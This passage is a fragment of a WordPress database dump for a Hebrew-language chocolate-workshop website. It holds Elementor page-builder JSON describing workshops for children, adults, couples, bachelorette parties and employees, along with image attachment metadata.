\\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false}]'),(2177,418,'_wp_attached_file','2019/12/Depositphotos_247319794_s-2019-1.jpg'),(2178,418,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:999;s:6:\"height\";i:667;s:4:\"file\";s:44:\"2019/12/Depositphotos_247319794_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"Depositphotos_247319794_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"Depositphotos_247319794_s-2019-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"Depositphotos_247319794_s-2019-1-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:44:\"Depositphotos_247319794_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2179,418,'_wp_attachment_image_alt','סדנת שוקולד לעובדים'),(2188,420,'_wp_attached_file','2019/12/Depositphotos_72660625_s-2019-1.jpg'),(2189,420,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:986;s:6:\"height\";i:1000;s:4:\"file\";s:43:\"2019/12/Depositphotos_72660625_s-2019-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"Depositphotos_72660625_s-2019-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"Depositphotos_72660625_s-2019-1-296x300.jpg\";s:5:\"width\";i:296;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"Depositphotos_72660625_s-2019-1-768x779.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:779;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:43:\"Depositphotos_72660625_s-2019-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2190,420,'_wp_attachment_image_alt','סדנת שוקולד בבית'),(2192,421,'_elementor_edit_mode','builder'),(2193,421,'_elementor_template_type','wp-page'),(2194,421,'_elementor_version','2.7.5'),(2195,421,'_elementor_pro_version','2.7.3'),(2196,421,'_wp_page_template','elementor_header_footer'),(2197,421,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2198,421,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 